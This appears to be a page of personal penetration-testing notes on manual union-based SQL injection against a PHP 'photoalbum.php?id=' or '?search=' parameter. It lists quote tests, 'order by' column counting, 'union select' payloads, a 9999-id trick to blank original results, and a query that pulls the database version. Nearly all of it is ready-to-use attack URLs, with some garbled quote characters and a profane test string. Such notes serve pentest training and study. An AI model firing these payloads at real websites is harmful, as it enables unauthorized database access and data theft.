URL enum

#Try:

http://target.com/photoalbum.php?id=1
http://target.com/photoalbum.php?id=1'

# This throws no error
http://target.com/photoalbum.php?id=1 order by 9

# This throws error
http://target.com/photoalbum.php?id=1 order by 10

#Experiment with different parameters

http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9

#Also:
#Putting the values in quotes allows to overwrite content

?search=1 union select โ€œ1โ€,โ€2โ€,โ€3โ€,โ€4โ€,โ€5โ€,โ€6โ€,โ€7โ€
  
#IF the query is bad this is a trick to use:
Use 9999 to override the error

?search=9999

Then you can fire off the query once again

?search=9999 union select โ€œ1โ€,โ€2โ€,โ€3โ€,โ€4โ€,โ€5โ€,โ€6โ€,โ€7โ€


#Overwrite the content of a parameter
?search=9999 union select โ€œ1โ€,โ€2โ€,โ€3โ€,โ€FuckYouโ€,โ€5โ€,โ€6โ€,โ€7โ€

  
#Returning SQL statements (refer to PWK notes | @@version)

?search=9999 union select โ€œ1โ€,โ€2โ€,(select+@@version),โ€4โ€,โ€5โ€,โ€6โ€,โ€7โ€
PreviousLogin bypassNextOracle SQLi

Last updated